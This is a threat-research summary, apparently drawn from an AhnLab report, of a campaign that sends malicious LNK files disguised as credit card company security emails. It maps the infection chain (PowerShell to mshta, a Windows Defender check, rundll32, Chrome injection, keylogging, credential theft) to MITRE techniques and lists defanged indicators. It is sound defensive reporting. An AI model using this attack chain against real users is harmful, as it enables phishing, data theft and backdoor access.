Threat Research

Don’t trust ‘secure mail’! malicious Files Impersonating Credit Card Companies Are Being Distributed

Ahnlab
Don’t trust ‘secure mail’! malicious Files Impersonating Credit Card Companies Are Being Distributed
AhnLab confirmed a campaign distributing malicious LNK files disguised as security emails from a major Korean credit card company, using different payload paths depending on whether Windows Defender is enabled or disabled. The attack deploys backdoors and infostealers such as notepad.log, net, and APP to steal browser, mail, wallet, clipboard, and keylogging data, with infrastructure including Google Drive-hosted downloads and MeshAgent-related configuration files. #AhnLab #Kimsuky #WindowsDefender #MeshAgent

Keypoints

  • Malicious LNK files were distributed as if they were security emails from a major credit card company in Korea.
  • The attack resembles a prior Kimsuky LNK campaign, but changes behavior based on the state of Windows Defender.
  • When Windows Defender is running, the malware downloads an encrypted pipe.log, decrypts it into pipe.zip, and extracts scripts and logs for theft and backdoor activity.
  • When Windows Defender is stopped, it downloads user.txt and sys.log, decrypts sys.log into sys.dll, and loads it with rundll32.
  • The extracted components include backdoor and infostealer payloads that perform remote command execution, file collection, browser data theft, keylogging, and clipboard theft.
  • One payload targets Chrome, Edge, and Whale cookies, while another steals account data from Chrome, Firefox, Thunderbird, Group Mail, and IncrediMail.
  • AhnLab advises users to verify file origins and types, and organizations to inspect suspicious registry entries and file creation in %TEMP% and %LOCALAPPDATA%.

MITRE Techniques

  • [T1204.002 ] User Execution: Malicious File – The victim is lured into opening a disguised file from a fake security email (‘malicious files disguised as security emails’ and ‘tricks users into executing malicious files’).
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – The LNK file uses PowerShell to invoke mshta (‘execute the mshta command through PowerShell’).
  • [T1218.005 ] System Binary Proxy Execution: Mshta – mshta.exe is used to execute a remote HTA file (‘an HTA file that exists at a specific address is executed via mshta.exe’).
  • [T1027 ] Obfuscated Files or Information – The HTA contains obfuscated VBScript and Base64-encoded content (‘contains obfuscated VBScript code’ and ‘Base64 encoded form’).
  • [T1105 ] Ingress Tool Transfer – Additional payloads are downloaded from remote locations including Google Drive (‘downloads and executes a decoy document’ and ‘downloads additional malicious files’).
  • [T1036 ] Masquerading – Files are disguised as legitimate documents or normal-looking logs such as pipe.log, user.txt, and sys.log (‘looks like a legitimate document’ and ‘disguised as security emails’).
  • [T1057 ] Process Discovery – The malware checks whether Windows Defender is running and scans chrome.exe (‘checks whether the Windows Defender security service is running’ and ‘scans the chrome.exe process’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Downloads are fetched over web services and Google Drive URLs (‘download URL’ and ‘Hxxps://drive.google[.]com/uc?export=download’).
  • [T1021 ] Remote Services – The backdoor supports remote command execution and management-like operations (‘remote command execution’ and ‘download remote management tool (MeshAgent) configuration files’).
  • [T1005 ] Data from Local System – The malware reads local file contents for execution and collection (‘reads the contents of the file’ and ‘collecting file and directory information’).
  • [T1056.001 ] Input Capture: Keylogging – One component records keystrokes (‘performs keylogging’).
  • [T1115 ] Clipboard Data – Clipboard data is collected by a malicious file (‘clipboard Data collection’ and ‘clipboard data stealing functions’).
  • [T1055 ] Process Injection – APP injects decrypted code into the main Chrome process (‘inject decrypted code into the main Chrome process’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Suspicious registry checks and entries are referenced as persistence-related artifacts (‘check the registered registry and delete any suspicious registry entries’).

Indicators of Compromise

  • [File names ] Malicious payloads and staging files – pipe.log, pipe.zip, 1.log, 1.ps1, 2.log, user.txt, sys.log, sys.dll, notepad.log, net, app.
  • [URLs ] Download locations for additional payloads – Hxxps://drive.google[.]com/uc?export=download&id=1veetviG********, Hxxps://drive.google[.]com/uc?export=download&id=1PTs95g********, and Hxxps://drive.google[.]com/uc?export=download&id=1EkyeoS********.
  • [File paths ] Staging and extraction locations – %LocalAppData%pipe, %LOCALAPPDATA%notepad.log, %LOCALAPPDATA%net, %LOCALAPPDATA%app, and %TEMP%.
  • [Process names ] Execution and defense checks – mshta.exe, curl, rundll32, chrome.exe, VBox, and VM.
  • [Cloud/service references ] Infrastructure and tool artifacts – Google Drive and MeshAgent configuration files.

Read more: https://asec.ahnlab.com/en/93855/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint